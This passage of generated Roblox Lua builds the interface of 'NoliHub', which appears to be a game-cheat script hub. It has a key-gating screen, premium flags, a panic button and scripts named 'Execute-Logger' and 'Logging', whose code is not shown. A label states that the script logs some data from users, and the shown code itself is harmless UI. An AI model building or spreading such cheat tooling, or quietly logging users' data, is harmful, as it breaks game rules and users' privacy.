0, 92, 0, 81);
G2L["10c"]["Visible"] = false;
G2L["10c"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["10c"]["BackgroundTransparency"] = 1;
G2L["10c"]["Name"] = [[Deletion]];
G2L["10c"]["Position"] = UDim2.new(0.50047, 0, 0.47882, 0);


-- StarterGui.NoliHub.MainFrame.Shadow.Deletion.UIAspectRatioConstraint
G2L["10d"] = Instance.new("UIAspectRatioConstraint", G2L["10c"]);



-- StarterGui.NoliHub.MainFrame.Settings
G2L["10e"] = Instance.new("ImageButton", G2L["c"]);
G2L["10e"]["Active"] = false;
G2L["10e"]["BorderSizePixel"] = 0;
G2L["10e"]["ScaleType"] = Enum.ScaleType.Fit;
G2L["10e"]["BackgroundColor3"] = Color3.fromRGB(148, 148, 148);
G2L["10e"]["Selectable"] = false;
G2L["10e"]["ZIndex"] = 0;
G2L["10e"]["Image"] = [[rbxassetid://10734950309]];
G2L["10e"]["TileSize"] = UDim2.new(0.3, 0, 1, 0);
G2L["10e"]["Size"] = UDim2.new(0, 56, 0, 17);
G2L["10e"]["Name"] = [[Settings]];
G2L["10e"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["10e"]["Position"] = UDim2.new(0.62617, 0, 0, 0);


-- StarterGui.NoliHub.MainFrame.Settings.UICorner
G2L["10f"] = Instance.new("UICorner", G2L["10e"]);
G2L["10f"]["CornerRadius"] = UDim.new(0, 10);


-- StarterGui.NoliHub.MainFrame.Settings.LocalScript
G2L["110"] = Instance.new("LocalScript", G2L["10e"]);



-- StarterGui.NoliHub.MainFrame.Panic
G2L["111"] = Instance.new("ImageButton", G2L["c"]);
G2L["111"]["Active"] = false;
G2L["111"]["BorderSizePixel"] = 0;
G2L["111"]["ScaleType"] = Enum.ScaleType.Fit;
G2L["111"]["BackgroundColor3"] = Color3.fromRGB(203, 0, 4);
G2L["111"]["Selectable"] = false;
G2L["111"]["ZIndex"] = 0;
G2L["111"]["Image"] = [[rbxassetid://10734961284]];
G2L["111"]["TileSize"] = UDim2.new(0.3, 0, 1, 0);
G2L["111"]["Size"] = UDim2.new(0, 56, 0, 17);
G2L["111"]["Name"] = [[Panic]];
G2L["111"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["111"]["Position"] = UDim2.new(0.62617, 70, 0, 0);


-- StarterGui.NoliHub.MainFrame.Panic.UICorner
G2L["112"] = Instance.new("UICorner", G2L["111"]);
G2L["112"]["CornerRadius"] = UDim.new(0, 10);


-- StarterGui.NoliHub.MainFrame.Panic.LocalScript
G2L["113"] = Instance.new("LocalScript", G2L["111"]);



-- StarterGui.NoliHub.MainFrame.Logo
G2L["114"] = Instance.new("Frame", G2L["c"]);
G2L["114"]["BorderSizePixel"] = 0;
G2L["114"]["BackgroundColor3"] = Color3.fromRGB(255, 162, 12);
G2L["114"]["Size"] = UDim2.new(0, 50, 0, 16);
G2L["114"]["Position"] = UDim2.new(0, 10, 0, 1);
G2L["114"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["114"]["Name"] = [[Logo]];


-- StarterGui.NoliHub.MainFrame.Logo.UICorner
G2L["115"] = Instance.new("UICorner", G2L["114"]);
G2L["115"]["CornerRadius"] = UDim.new(0.3, 0);


-- StarterGui.NoliHub.MainFrame.Logo.TextLabel
G2L["116"] = Instance.new("TextLabel", G2L["114"]);
G2L["116"]["BorderSizePixel"] = 0;
G2L["116"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["116"]["TextSize"] = 20;
G2L["116"]["FontFace"] = Font.new([[rbxasset://fonts/families/TitilliumWeb.json]], Enum.FontWeight.Bold, Enum.FontStyle.Normal);
G2L["116"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
G2L["116"]["BackgroundTransparency"] = 1;
G2L["116"]["Size"] = UDim2.new(0, 69, 0, 18);
G2L["116"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["116"]["Text"] = [[Noli]];
G2L["116"]["Position"] = UDim2.new(0, -10, 0, -2);


-- StarterGui.NoliHub.MainFrame.Logo.Logo1
G2L["117"] = Instance.new("Frame", G2L["114"]);
G2L["117"]["BorderSizePixel"] = 0;
G2L["117"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["117"]["Size"] = UDim2.new(0, 30, 0, 16);
G2L["117"]["Position"] = UDim2.new(0, 53, 0, 1);
G2L["117"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["117"]["Name"] = [[Logo1]];


-- StarterGui.NoliHub.MainFrame.Logo.Logo1.UICorner
G2L["118"] = Instance.new("UICorner", G2L["117"]);
G2L["118"]["CornerRadius"] = UDim.new(0.3, 0);


-- StarterGui.NoliHub.MainFrame.Logo.Logo1.TextLabel
G2L["119"] = Instance.new("TextLabel", G2L["117"]);
G2L["119"]["BorderSizePixel"] = 0;
G2L["119"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["119"]["TextSize"] = 20;
G2L["119"]["FontFace"] = Font.new([[rbxasset://fonts/families/TitilliumWeb.json]], Enum.FontWeight.Bold, Enum.FontStyle.Normal);
G2L["119"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["119"]["BackgroundTransparency"] = 1;
G2L["119"]["Size"] = UDim2.new(0, 69, 0, 18);
G2L["119"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["119"]["Text"] = [[Hub]];
G2L["119"]["Position"] = UDim2.new(0, -19, 0, -4);


-- StarterGui.NoliHub.MainFrame.Logo.UIScale
G2L["11a"] = Instance.new("UIScale", G2L["114"]);



-- StarterGui.NoliHub.Close
G2L["11b"] = Instance.new("LocalScript", G2L["1"]);
G2L["11b"]["Name"] = [[Close]];


-- StarterGui.NoliHub.Values
G2L["11c"] = Instance.new("Folder", G2L["1"]);
G2L["11c"]["Name"] = [[Values]];


-- StarterGui.NoliHub.Values.Freemium
G2L["11d"] = Instance.new("BoolValue", G2L["11c"]);
G2L["11d"]["Name"] = [[Freemium]];


-- StarterGui.NoliHub.Values.Premium
G2L["11e"] = Instance.new("BoolValue", G2L["11c"]);
G2L["11e"]["Name"] = [[Premium]];


-- StarterGui.NoliHub.Deletion
G2L["11f"] = Instance.new("LocalScript", G2L["1"]);
G2L["11f"]["Name"] = [[Deletion]];


-- StarterGui.NoliHub.Deletion.Value
G2L["120"] = Instance.new("BoolValue", G2L["11f"]);



-- StarterGui.NoliHub.Execute-Logger
G2L["121"] = Instance.new("LocalScript", G2L["1"]);
G2L["121"]["Name"] = [[Execute-Logger]];


-- StarterGui.NoliHub.KeySystem
G2L["122"] = Instance.new("Frame", G2L["1"]);
G2L["122"]["Visible"] = false;
G2L["122"]["BorderSizePixel"] = 0;
G2L["122"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["122"]["AnchorPoint"] = Vector2.new(0.5, 0.5);
G2L["122"]["Size"] = UDim2.new(0.33507, 0, 0.34393, 0);
G2L["122"]["Position"] = UDim2.new(0.50155, 0, 0.49923, 0);
G2L["122"]["BorderColor3"] = Color3.fromRGB(28, 43, 54);
G2L["122"]["Name"] = [[KeySystem]];


-- StarterGui.NoliHub.KeySystem.UICorner
G2L["123"] = Instance.new("UICorner", G2L["122"]);
G2L["123"]["CornerRadius"] = UDim.new(0, 10);


-- StarterGui.NoliHub.KeySystem.UIGradient
G2L["124"] = Instance.new("UIGradient", G2L["122"]);
G2L["124"]["Color"] = ColorSequence.new{ColorSequenceKeypoint.new(0.000, Color3.fromRGB(28, 28, 28)),ColorSequenceKeypoint.new(0.521, Color3.fromRGB(35, 35, 35)),ColorSequenceKeypoint.new(1.000, Color3.fromRGB(37, 37, 37))};


-- StarterGui.NoliHub.KeySystem.Title
G2L["125"] = Instance.new("TextLabel", G2L["122"]);
G2L["125"]["TextWrapped"] = true;
G2L["125"]["BorderSizePixel"] = 0;
G2L["125"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["125"]["TextScaled"] = true;
G2L["125"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["125"]["TextSize"] = 14;
G2L["125"]["FontFace"] = Font.new([[rbxasset://fonts/families/GothamSSm.json]], Enum.FontWeight.Bold, Enum.FontStyle.Normal);
G2L["125"]["TextColor3"] = Color3.fromRGB(239, 239, 239);
G2L["125"]["BackgroundTransparency"] = 1;
G2L["125"]["AnchorPoint"] = Vector2.new(0.5, 0.5);
G2L["125"]["Size"] = UDim2.new(0.42454, 0, 0.05838, 0);
G2L["125"]["BorderColor3"] = Color3.fromRGB(28, 43, 54);
G2L["125"]["Text"] = [[N0LiWare]];
G2L["125"]["Name"] = [[Title]];
G2L["125"]["Position"] = UDim2.new(0.28059, 0, 0.1412, 0);


-- StarterGui.NoliHub.KeySystem.KeySys
G2L["126"] = Instance.new("TextLabel", G2L["122"]);
G2L["126"]["TextWrapped"] = true;
G2L["126"]["BorderSizePixel"] = 0;
G2L["126"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["126"]["TextScaled"] = true;
G2L["126"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["126"]["TextSize"] = 14;
G2L["126"]["FontFace"] = Font.new([[rbxasset://fonts/families/GothamSSm.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["126"]["TextColor3"] = Color3.fromRGB(209, 209, 209);
G2L["126"]["BackgroundTransparency"] = 1;
G2L["126"]["AnchorPoint"] = Vector2.new(0.5, 0.5);
G2L["126"]["Size"] = UDim2.new(0.42454, 0, 0.04759, 0);
G2L["126"]["BorderColor3"] = Color3.fromRGB(28, 43, 54);
G2L["126"]["Text"] = [[Key System]];
G2L["126"]["Name"] = [[KeySys]];
G2L["126"]["Position"] = UDim2.new(0.28059, 0, 0.19282, 0);


-- StarterGui.NoliHub.KeySystem.KeyBox
G2L["127"] = Instance.new("Frame", G2L["122"]);
G2L["127"]["BorderSizePixel"] = 0;
G2L["127"]["BackgroundColor3"] = Color3.fromRGB(54, 54, 54);
G2L["127"]["AnchorPoint"] = Vector2.new(0.5, 0.5);
G2L["127"]["Size"] = UDim2.new(0.41311, 0, 0.09132, 0);
G2L["127"]["Position"] = UDim2.new(0.27518, 0, 0.42604, 0);
G2L["127"]["BorderColor3"] = Color3.fromRGB(28, 43, 54);
G2L["127"]["Name"] = [[KeyBox]];


-- StarterGui.NoliHub.KeySystem.KeyBox.UICorner
G2L["128"] = Instance.new("UICorner", G2L["127"]);
G2L["128"]["CornerRadius"] = UDim.new(0, 6);


-- StarterGui.NoliHub.KeySystem.KeyBox.KeyText
G2L["129"] = Instance.new("TextBox", G2L["127"]);
G2L["129"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["129"]["BorderSizePixel"] = 0;
G2L["129"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["129"]["TextWrapped"] = true;
G2L["129"]["TextSize"] = 14;
G2L["129"]["Name"] = [[KeyText]];
G2L["129"]["TextScaled"] = true;
G2L["129"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["129"]["FontFace"] = Font.new([[rbxasset://fonts/families/GothamSSm.json]], Enum.FontWeight.Medium, Enum.FontStyle.Normal);
G2L["129"]["AnchorPoint"] = Vector2.new(0.5, 0.5);
G2L["129"]["PlaceholderText"] = [[Ключ]];
G2L["129"]["Size"] = UDim2.new(0.86654, 0, 0.52987, 0);
G2L["129"]["Position"] = UDim2.new(0.49432, 0, 0.49469, 0);
G2L["129"]["BorderColor3"] = Color3.fromRGB(28, 43, 54);
G2L["129"]["Text"] = [[]];
G2L["129"]["BackgroundTransparency"] = 1;


-- StarterGui.NoliHub.KeySystem.KeyBox.UIStroke
G2L["12a"] = Instance.new("UIStroke", G2L["127"]);
G2L["12a"]["Thickness"] = 1.2;
G2L["12a"]["Color"] = Color3.fromRGB(86, 86, 86);


-- StarterGui.NoliHub.KeySystem.KeyBox.LocalScript
G2L["12b"] = Instance.new("LocalScript", G2L["127"]);



-- StarterGui.NoliHub.KeySystem.Title2
G2L["12c"] = Instance.new("TextLabel", G2L["122"]);
G2L["12c"]["TextWrapped"] = true;
G2L["12c"]["BorderSizePixel"] = 0;
G2L["12c"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["12c"]["TextScaled"] = true;
G2L["12c"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["12c"]["TextSize"] = 14;
G2L["12c"]["FontFace"] = Font.new([[rbxasset://fonts/families/GothamSSm.json]], Enum.FontWeight.Bold, Enum.FontStyle.Normal);
G2L["12c"]["TextColor3"] = Color3.fromRGB(126, 126, 126);
G2L["12c"]["BackgroundTransparency"] = 1;
G2L["12c"]["AnchorPoint"] = Vector2.new(0.5, 0.5);
G2L["12c"]["Size"] = UDim2.new(0.68845, 0, 0.05035, 0);
G2L["12c"]["BorderColor3"] = Color3.fromRGB(28, 43, 54);
G2L["12c"]["Text"] = [[Заметка]];
G2L["12c"]["Name"] = [[Title2]];
G2L["12c"]["Position"] = UDim2.new(0.41248, 0, 0.80147, 0);


-- StarterGui.NoliHub.KeySystem.How
G2L["12d"] = Instance.new("TextLabel", G2L["122"]);
G2L["12d"]["TextWrapped"] = true;
G2L["12d"]["BorderSizePixel"] = 0;
G2L["12d"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["12d"]["TextScaled"] = true;
G2L["12d"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["12d"]["TextSize"] = 14;
G2L["12d"]["FontFace"] = Font.new([[rbxasset://fonts/families/GothamSSm.json]], Enum.FontWeight.Medium, Enum.FontStyle.Normal);
G2L["12d"]["TextColor3"] = Color3.fromRGB(126, 126, 126);
G2L["12d"]["BackgroundTransparency"] = 1;
G2L["12d"]["RichText"] = true;
G2L["12d"]["AnchorPoint"] = Vector2.new(0.5, 0.5);
G2L["12d"]["Size"] = UDim2.new(0.60403, 0, 0.1113, 0);
G2L["12d"]["BorderColor3"] = Color3.fromRGB(28, 43, 54);
G2L["12d"]["Text"] = [[скрипт логирует некоторые данные при подключении к ключ-системе]];
G2L["12d"]["Name"] = [[How]];
G2L["12d"]["Position"] = UDim2.new(0.36934, 0, 0.88328, 0);


-- StarterGui.NoliHub.KeySystem.UIStroke
G2L["12e"] = Instance.new("UIStroke", G2L["122"]);
G2L["12e"]["Thickness"] = 1.2;
G2L["12e"]["Color"] = Color3.fromRGB(118, 118, 118);


-- StarterGui.NoliHub.KeySystem.Title2
G2L["12f"] = Instance.new("TextLabel", G2L["122"]);
G2L["12f"]["TextWrapped"] = true;
G2L["12f"]["BorderSizePixel"] = 0;
G2L["12f"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["12f"]["TextScaled"] = true;
G2L["12f"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["12f"]["TextSize"] = 14;
G2L["12f"]["FontFace"] = Font.new([[rbxasset://fonts/families/GothamSSm.json]], Enum.FontWeight.Bold, Enum.FontStyle.Normal);
G2L["12f"]["TextColor3"] = Color3.fromRGB(201, 201, 201);
G2L["12f"]["BackgroundTransparency"] = 1;
G2L["12f"]["AnchorPoint"] = Vector2.new(0.5, 0.5);
G2L["12f"]["Size"] = UDim2.new(0.50726, 0, 0.04327, 0);
G2L["12f"]["BorderColor3"] = Color3.fromRGB(28, 43, 54);
G2L["12f"]["Text"] = [[Введите свой ключ]];
G2L["12f"]["Name"] = [[Title2]];
G2L["12f"]["Position"] = UDim2.new(0.32195, 0, 0.34218, 0);


-- StarterGui.NoliHub.KeySystem.Glow
G2L["130"] = Instance.new("ImageLabel", G2L["122"]);
G2L["130"]["ZIndex"] = 0;
G2L["130"]["SliceCenter"] = Rect.new(24, 24, 276, 276);
G2L["130"]["ScaleType"] = Enum.ScaleType.Slice;
G2L["130"]["ImageColor3"] = Color3.fromRGB(0, 0, 0);
G2L["130"]["Image"] = [[rbxassetid://5028857084]];
G2L["130"]["Size"] = UDim2.new(1, 30, 1, 30);
G2L["130"]["BackgroundTransparency"] = 1;
G2L["130"]["Name"] = [[Glow]];
G2L["130"]["Position"] = UDim2.new(0, -15, 0, -15);


-- StarterGui.NoliHub.KeySystem.Glow
G2L["131"] = Instance.new("ImageLabel", G2L["122"]);
G2L["131"]["ZIndex"] = 0;
G2L["131"]["SliceCenter"] = Rect.new(24, 24, 276, 276);
G2L["131"]["ScaleType"] = Enum.ScaleType.Slice;
G2L["131"]["ImageColor3"] = Color3.fromRGB(0, 0, 0);
G2L["131"]["Image"] = [[rbxassetid://5028857084]];
G2L["131"]["Size"] = UDim2.new(1, 30, 1, 30);
G2L["131"]["BackgroundTransparency"] = 1;
G2L["131"]["Name"] = [[Glow]];
G2L["131"]["Position"] = UDim2.new(0, -15, 0, -15);


-- StarterGui.NoliHub.KeySystem.UIAspectRatioConstraint
G2L["132"] = Instance.new("UIAspectRatioConstraint", G2L["122"]);
G2L["132"]["AspectRatio"] = 1.73107;


-- StarterGui.NoliHub.KeySystem.Else
G2L["133"] = Instance.new("TextLabel", G2L["122"]);
G2L["133"]["TextWrapped"] = true;
G2L["133"]["BorderSizePixel"] = 0;
G2L["133"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["133"]["TextScaled"] = true;
G2L["133"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["133"]["TextSize"] = 7;
G2L["133"]["FontFace"] = Font.new([[rbxasset://fonts/families/GothamSSm.json]], Enum.FontWeight.Bold, Enum.FontStyle.Normal);
G2L["133"]["TextColor3"] = Color3.fromRGB(239, 239, 239);
G2L["133"]["BackgroundTransparency"] = 1;
G2L["133"]["AnchorPoint"] = Vector2.new(0.5, 0.5);
G2L["133"]["Size"] = UDim2.new(0.4485, 0, 0.14754, 0);
G2L["133"]["BorderColor3"] = Color3.fromRGB(28, 43, 54);
G2L["133"]["Text"] = [[никто не любит ключ системы, но они нужны что бы запрещать определённым пользователям использовать этот скрипт]];
G2L["133"]["Name"] = [[Else]];
G2L["133"]["Position"] = UDim2.new(0.75087, 0, 0.33353, 0);


-- StarterGui.NoliHub.KeySystem.ElseDesc
G2L["134"] = Instance.new("TextLabel", G2L["122"]);
G2L["134"]["TextWrapped"] = true;
G2L["134"]["BorderSizePixel"] = 0;
G2L["134"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["134"]["TextScaled"] = true;
G2L["134"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["134"]["TextSize"] = 14;
G2L["134"]["FontFace"] = Font.new([[rbxasset://fonts/families/GothamSSm.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["134"]["TextColor3"] = Color3.fromRGB(209, 209, 209);
G2L["134"]["BackgroundTransparency"] = 1;
G2L["134"]["AnchorPoint"] = Vector2.new(0.5, 0.5);
G2L["134"]["Size"] = UDim2.new(0.36714, 0, 0.1546, 0);
G2L["134"]["BorderColor3"] = Color3.fromRGB(28, 43, 54);
G2L["134"]["Text"] = [[Приобретение ключей пока что недоступно:(]];
G2L["134"]["Name"] = [[ElseDesc]];
G2L["134"]["Position"] = UDim2.new(0.71223, 0, 0.48324, 0);


-- StarterGui.NoliHub.KeySystem.KeyStatus
G2L["135"] = Instance.new("TextLabel", G2L["122"]);
G2L["135"]["TextWrapped"] = true;
G2L["135"]["BorderSizePixel"] = 0;
G2L["135"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["135"]["TextScaled"] = true;
G2L["135"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["135"]["TextSize"] = 14;
G2L["135"]["FontFace"] = Font.new([[rbxasset://fonts/families/GothamSSm.json]], Enum.FontWeight.Bold, Enum.FontStyle.Normal);
G2L["135"]["TextColor3"] = Color3.fromRGB(209, 209, 209);
G2L["135"]["BackgroundTransparency"] = 1;
G2L["135"]["AnchorPoint"] = Vector2.new(0.5, 0.5);
G2L["135"]["Size"] = UDim2.new(0.36714, 0, 0.08337, 0);
G2L["135"]["BorderColor3"] = Color3.fromRGB(28, 43, 54);
G2L["135"]["Text"] = [[Ожидаю запрос от KeySys...]];
G2L["135"]["Name"] = [[KeyStatus]];
G2L["135"]["Position"] = UDim2.new(0.71223, 0, 0.60108, 0);


-- StarterGui.NoliHub.KeySystem.Welcome
G2L["136"] = Instance.new("Frame", G2L["122"]);
G2L["136"]["Visible"] = false;
G2L["136"]["BorderSizePixel"] = 0;
G2L["136"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["136"]["AnchorPoint"] = Vector2.new(0.5, 0.5);
G2L["136"]["Size"] = UDim2.new(1.07757, 0, 1.20629, 0);
G2L["136"]["Position"] = UDim2.new(0.50427, 0, 0.50683, 0);
G2L["136"]["BorderColor3"] = Color3.fromRGB(28, 43, 54);
G2L["136"]["Name"] = [[Welcome]];


-- StarterGui.NoliHub.KeySystem.Welcome.UICorner
G2L["137"] = Instance.new("UICorner", G2L["136"]);
G2L["137"]["CornerRadius"] = UDim.new(0, 10);


-- StarterGui.NoliHub.KeySystem.Welcome.UIGradient
G2L["138"] = Instance.new("UIGradient", G2L["136"]);
G2L["138"]["Color"] = ColorSequence.new{ColorSequenceKeypoint.new(0.000, Color3.fromRGB(28, 28, 28)),ColorSequenceKeypoint.new(0.521, Color3.fromRGB(35, 35, 35)),ColorSequenceKeypoint.new(1.000, Color3.fromRGB(37, 37, 37))};


-- StarterGui.NoliHub.KeySystem.Welcome.UIStroke
G2L["139"] = Instance.new("UIStroke", G2L["136"]);
G2L["139"]["Thickness"] = 1.2;
G2L["139"]["Color"] = Color3.fromRGB(118, 118, 118);


-- StarterGui.NoliHub.KeySystem.Welcome.Title
G2L["13a"] = Instance.new("TextLabel", G2L["136"]);
G2L["13a"]["TextWrapped"] = true;
G2L["13a"]["BorderSizePixel"] = 0;
G2L["13a"]["TextScaled"] = true;
G2L["13a"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["13a"]["TextSize"] = 14;
G2L["13a"]["FontFace"] = Font.new([[rbxasset://fonts/families/GothamSSm.json]], Enum.FontWeight.Bold, Enum.FontStyle.Normal);
G2L["13a"]["TextColor3"] = Color3.fromRGB(239, 239, 239);
G2L["13a"]["BackgroundTransparency"] = 1;
G2L["13a"]["AnchorPoint"] = Vector2.new(0.5, 0.5);
G2L["13a"]["Size"] = UDim2.new(0.42454, 0, 0.05411, 0);
G2L["13a"]["BorderColor3"] = Color3.fromRGB(28, 43, 54);
G2L["13a"]["Text"] = [[Welcome to DomainX!]];
G2L["13a"]["Name"] = [[Title]];
G2L["13a"]["Position"] = UDim2.new(0.49966, 0, 0.4976, 0);


-- StarterGui.NoliHub.KeySystem.Welcome.Script
G2L["13b"] = Instance.new("Script", G2L["136"]);
G2L["13b"]["Enabled"] = false;
G2L["13b"]["Disabled"] = true;


-- StarterGui.NoliHub.KeySystem.KeySystem
G2L["13c"] = Instance.new("LocalScript", G2L["122"]);
G2L["13c"]["Name"] = [[KeySystem]];


-- StarterGui.NoliHub.KeySystem.TextLabel
G2L["13d"] = Instance.new("TextLabel", G2L["122"]);
G2L["13d"]["BorderSizePixel"] = 0;
G2L["13d"]["TextTransparency"] = 1;
G2L["13d"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["13d"]["TextSize"] = 14;
G2L["13d"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["13d"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["13d"]["BackgroundTransparency"] = 1;
G2L["13d"]["Size"] = UDim2.new(0, 114, 0, 31);
G2L["13d"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["13d"]["Position"] = UDim2.new(0.07089, 0, 0.49534, 0);


-- StarterGui.NoliHub.KeySystem.TextLabel.Correct
G2L["13e"] = Instance.new("LocalScript", G2L["13d"]);
G2L["13e"]["Enabled"] = false;
G2L["13e"]["Name"] = [[Correct]];
G2L["13e"]["Disabled"] = true;


-- StarterGui.NoliHub.KeySystem.TextLabel.Incorrect
G2L["13f"] = Instance.new("LocalScript", G2L["13d"]);
G2L["13f"]["Enabled"] = false;
G2L["13f"]["Name"] = [[Incorrect]];
G2L["13f"]["Disabled"] = true;


-- StarterGui.NoliHub.KeySystem.Log
G2L["140"] = Instance.new("ScrollingFrame", G2L["122"]);
G2L["140"]["Active"] = true;
G2L["140"]["BorderSizePixel"] = 0;
G2L["140"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["140"]["Name"] = [[Log]];
G2L["140"]["Size"] = UDim2.new(0, 409, 0, 233);
G2L["140"]["ScrollBarImageColor3"] = Color3.fromRGB(0, 0, 0);
G2L["140"]["Position"] = UDim2.new(0.01287, -3, 0.12599, -30);
G2L["140"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["140"]["ScrollBarThickness"] = 0;
G2L["140"]["BackgroundTransparency"] = 1;


-- StarterGui.NoliHub.KeySystem.Logging
G2L["141"] = Instance.new("LocalScript", G2L["122"]);
G2L["141"]["Name"] = [[Logging]];


-- StarterGui.NoliHub.KeySystem.Drag
G2L["142"] = Instance.new("LocalScript", G2L["122"]);
G2L["142"]["Name"] = [[Drag]];


-- StarterGui.NoliHub.Startup
G2L["143"] = Instance.new("LocalScript", G2L["1"]);
G2L["143"]["Name"] = [[Startup]];


-- StarterGui.NoliHub.CloseNopen
G2L["144"] = Instance.new("TextButton", G2L["1"]);
G2L["144"]["Active"] = false;
G2L["144"]["BorderSizePixel"] = 0;
G2L["144"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["144"]["Selectable"] = false;
G2L["144"]["Size"] = UDim2.new(0, 52, 0, 50);
G2L["144"]["Name"] = [[CloseNopen]];
G2L["144"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["144"]["Text"] = [[Спрятать]];
G2L["144"]["Position"] = UDim2.new(0.73328, 0, 0.21892, 0);


-- StarterGui.NoliHub.CloseNopen.UICorner
G2L["145"] = Instance.new("UICorner", G2L["144"]);
G2L["145"]["CornerRadius"] = UDim.new(1, 0);


-- StarterGui.NoliHub.CloseNopen.Drag
G2L["146"] = Instance.new("LocalScript", G2L["144"]);
G2L["146"]["Name"] = [[Drag]];


-- StarterGui.NoliHub.CloseNopen.LocalScript
G2L["147"] = Instance.new("LocalScript", G2L["144"]);



-- StarterGui.NoliHub.ServerManager
G2L["148"] = Instance.new("LocalScript", G2L["1"]);
G2L["148"]["Name"] = [[ServerManager]];


-- StarterGui.NoliHub.Rejoin.LocalScript
local function C_a()
local script = G2L["a"];
	local Players = game:GetService("Players")
	local TeleportService = game:GetService("TeleportService")
	local PlaceId = 168556275
	
	local button = script.Parent
	
	local function Click()
		TeleportService:Teleport(PlaceId, Players.LocalPlayer)
	end
	
	button.MouseButton1Click:Connect(Click)
end;
task.spawn(C_a);
-- StarterGui.NoliHub.MainFrame.Welcome.Name.InsertName
local function C_19()
local script = G2L["19"];
	local Players = game:GetService("Players")
	
	-- Функция для вставки имени игрока в TextLabel
	local function insertPlayerName(textLabel)
		-- Получаем игрока, которому принадлежит LocalScript
		local player = Players.LocalPlayer
	
		if player then
			-- Устанавливаем текст TextLabel с именем игрока
			textLabel.Text = "Добро пожаловать, " .. player.Name
		else
			warn("Player not found!")
		end
	end
	
	-- Пример использования
	local textLabel = script.Parent -- Укажите имя вашего TextLabel
	insertPlayerName(textLabel)
	
end;
task.spawn(C_19);
-- StarterGui.NoliHub.MainFrame.Welcome.Move
local function C_1a()
local script = G2L["1a"];
	local TweenService = game:GetService("TweenService")
	
	local guiElement = script.Parent -- GUI элемент, который нужно переместить
	local boolValue = script.Parent.MoveThis -- Предполагаем, что BoolValue находится в том же родителе
	
	-- Функция для плавного перемещения GUI элемента
	local function moveGuiElement(units, direction, time, onComplete)
		-- Задаем целевую позицию в зависимости от направления и количества единиц
		local targetPosition
		if direction == "up" then
			targetPosition = guiElement.Position + UDim2.new(0, 0, -units / 100, 0)
		elseif direction == "down" then
			targetPosition = guiElement.Position + UDim2.new(0, 0, units / 100, 0)
		elseif direction == "left" then
			targetPosition = guiElement.Position + UDim2.new(-units / 100, 0, 0, 0)
		elseif direction == "right" then
			targetPosition = guiElement.Position + UDim2.new(units / 100, 0, 0, 0)
		else
			warn("Invalid direction specified. Use 'up', 'down', 'left', or 'right'.")
			return
		end
	
		local tweenInfo = TweenInfo.new(
			time, -- Время анимации
			Enum.EasingStyle.Back, -- Стиль плавности
			Enum.EasingDirection.InOut, -- Направление анимации
			0, -- Повторение (0 = без повторения)
			false, -- Обратная анимация
			5 -- Задержка перед началом
		)
	
		local tween = TweenService:Create(guiElement, tweenInfo, {Position = targetPosition})
	
		-- Добавляем действие, которое выполняется после завершения анимации
		tween.Completed:Connect(function()
			if onComplete then
				onComplete()
				script.Parent.Visible = false
				script.Parent.Parent.Protects.SimpleProtect.Visible = false
			end
		end)
	
		tween:Play()
	end
	
	-- Функция для запуска анимации
	local function startAnimation()
		script.Parent.Parent.Protects.SimpleProtect.Visible = true
		script.Parent.Visible = true
		moveGuiElement(230, "up", 5, function()
			print("Анимация завершена, действие выполнено.")
		end)
	end
	
	-- Отслеживаем изменения значения BoolValue
	boolValue.Changed:Connect(function()
		if boolValue.Value then
			startAnimation()
		end
	end)
	
	-- Если BoolValue уже true, запускаем анимацию сразу
	if boolValue.Value then
		startAnimation()
	end
	
end;
task.spawn(C_1a);
-- StarterGui.NoliHub.MainFrame.Tabs.Home.LocalScript
local function C_24()
local script = G2L["24"];
	local button = script.Parent
	
	local function leftClick()
		script.Parent.Parent.Parent.Screens.Home.Visible = true
		script.Parent.Parent.Parent.Screens.Scripts.Visible = false
